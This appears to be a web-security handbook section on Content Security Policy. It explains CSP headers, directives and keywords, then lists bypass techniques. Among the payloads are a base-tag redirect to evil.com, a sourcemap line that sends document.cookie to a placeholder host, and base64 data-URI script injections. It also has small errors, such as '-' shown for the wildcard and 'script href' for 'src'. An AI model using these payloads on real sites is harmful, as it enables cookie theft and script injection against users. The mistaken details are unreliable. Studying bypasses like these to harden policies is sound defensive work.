4.2.4. CSP

4.2.4.1. What is CSP?

Content Security Policy, referred to as CSP, translated as Content Security Policy. As the name suggests, this specification is related to content security, mainly used to define which resources can be loaded by the current page and reduce the occurrence of XSS.

4.2.4.2. Configuration

CSP policies can be defined through HTTP headers or meta elements.

There are three categories of CSP:

  • Content-Security-Policy (Google Chrome)

  • X-Content-Security-Policy (Firefox)

  • X-WebKit-CSP (WebKit-based browsers, e.g. Safari)

HTTP header :
"Content-Security-Policy:" policy
"Content-Security-Policy-Report-Only:" policy

HTTP Content-Security-Policy header can specify that one or more resources are secure, while Content-Security-Policy-Report-Only allows the server to check (not enforce) a policy. Policy definitions for multiple headers take precedence with the one defined first.

HTML Meta :

<meta http-equiv="content-security-policy" content="policy">
<meta http-equiv="content-security-policy-report-only" content="policy">

4.2.4.2.1. Instruction Description

instruction

illustrate

default-src

Define the default resource loading strategy

connect-src

Define loading strategies such as Ajax, WebSocket, etc.

font-src

Define Font loading strategy

frame-src

Define Frame Loading Strategy

img-src

Define image loading strategy

media-src

Define <audio>, <video> and other reference resource loading strategies

object-src

Define <applet>, <embed>, <object> and other reference resource loading strategies

script-src

Define JS loading strategy

style-src

Define CSS loading strategy

base-uri

Defines the <base> root URL policy, not using default-src as default

sandbox

A value of allow-forms enables sandbox for the resource

report-uri

The value is /report-uri, the commit log

4.2.4.2.2. Keywords

  • -
    • Allow loading from arbitrary urls, excep data: blob: filesystem: schemes

    • e.g. img-src -

  • none
    • Disallow loading resources from any url

    • e.g. object-src 'none'

  • self
    • Only same-origin resources can be loaded

    • e.g. img-src 'self'

  • data:
    • Resources can be loaded through the data protocol

    • e.g. img-src 'self' data:

  • domain.example.com
    • e.g. img-src domain.example.com

    • Resources can only be loaded from specific domains

  • \*.example.com
    • e.g. img-src \*.example.com

    • Resources can be loaded from any subdomain of example.com

  • https://cdn.com
    • e.g. img-src https://cdn.com

    • Resources can only be loaded with https from a given domain

  • https:
    • e.g. img-src https:

    • Resources can only be loaded with https from any domain

  • unsafe-inline
    • Allow internal resources to execute code such as style attributes, onclick or sicript tags

    • e.g. script-src 'unsafe-inline'

  • unsafe-eval
    • Allows some unsafe code execution methods, such as js’s eval()

    • e.g. script-src 'unsafe-eval'

  • nonce-<base64-value>'
    • Use a random nonce, allowing to load tags that match the nonce attribute on the tag

    • e.g. script-src 'nonce-bm9uY2U='

  • <hash-algo>-<base64-value>'
    • Allow code blocks with matching hash values ​​to be executed

    • e.g. script-src 'sha256-<base64-value>'

4.2.4.2.3. Configuration example

Allow execution of inline JS code, but not loading external resources

Content-Security-Policy: default-src 'self'; script-src 'self' 'unsafe-inline';

4.2.4.3. Bypass

4.2.4.3.1. Preloading

In order to enhance the user experience and make the browser more efficient, the browser has a preloading function, which generally uses the idle time of the browser to load the specified content and then cache it. This technology is subdivided into DNS-prefetch, subresource, prefetch, preconnect, prerender.

HTML5 page preload is specified with the rel attribute of the link tag. If the csp header has unsafe-inline, you can make a request to the outside world by preloading, for example:

<!-- preloading page -->
<link rel='prefetch' href='http://xxxx'><!-- firefox -->
<link rel='prerender' href='http://xxxx'><!-- chrome -->
<!-- preloading image -->
<link rel='prefetch' href='http://xxxx/x.jpg'>
<!-- DNS prefetch -->
<link rel="dns-prefetch" href="http://xxxx">
<!-- preloading specific file types -->
<link rel='preload' href='//xxxxx/xx.js'><!-- chrome -->

In addition, not all pages can be preloaded, and the preload operation will be blocked when the resource type is as follows:

  • URL contains download resources

  • The page contains audio and video

  • ajax requests for POST, PUT and DELET operations

  • HTTP Authentication

  • HTTPS pages

  • Malware pages

  • popup page

  • Pages that take up a lot of resources

  • Open chrome developer tools

4.2.4.3.2. MIME Sniff

For example, csp prohibits cross-site reading of scripts, but cross-site reading of img is possible, then pass an img containing a script, and then <script href='http://xxx.com/xx.jpg'> , here csp thinks it is an img, bypassing the check, if the website does not return the correct mime type, the browser will guess, it may load the img as a script

4.2.4.3.3. 302 Jump

For 302 jump bypass CSP, there are actually the following limitations:

  • The springboard must be within an allowed domain.

  • The host part of the file to be loaded must match the host part of the allowed domain

4.2.4.3.4. iframe

When the code can be executed, you can create a frame whose source is a static like css js etc. When the configuration is incorrect, the frame does not have csp, and then the frame is created again under the frame to achieve the purpose of bypass. In the same way, use ../../../ /%2e%2e%2f in the links that may trigger the server to report an error can also achieve the corresponding purpose.

4.2.4.3.5. base-uri

When script-src is nonce or unlimited, and base-uri is unlimited, the root URL can be modified by base tag to bypass, and http://evil.com/main.js is loaded as follows:

<base href="http://evil.com/">
<script nonce="correct value" src="/main.js"></script>

4.2.4.3.6. Others

  • location bypass

  • Bypass same-origin sites with malicious SVGs when SVGs can be uploaded

  • When there is a CRLF vulnerability and the controllable point is above the CSP, it can be injected into the HTTP response to affect the CSP parsing

  • CND Bypass,if the website trusts a CDN, it can use the static resource bypass of the corresponding CDN

  • Angular versions <1.5.9 >=1.5.0, there is a vulnerability Git Pull Request

  • jQuery sourcemap
    document.write(`<script>
    //@        sourceMappingURL=http://xxxx/`+document.cookie+`<\/script>`);``
    
  • ping attribute of a tag

  • For FireFox <META HTTP-EQUIV="refresh" CONTENT="0; url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnSWhhdmVZb3VOb3cnKTs8L3NjcmlwdD4=">

  • <link rel="import" />

  • <meta http-equiv="refresh" content="0; url=http://...." />

  • When restricting only script-src
    • <object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>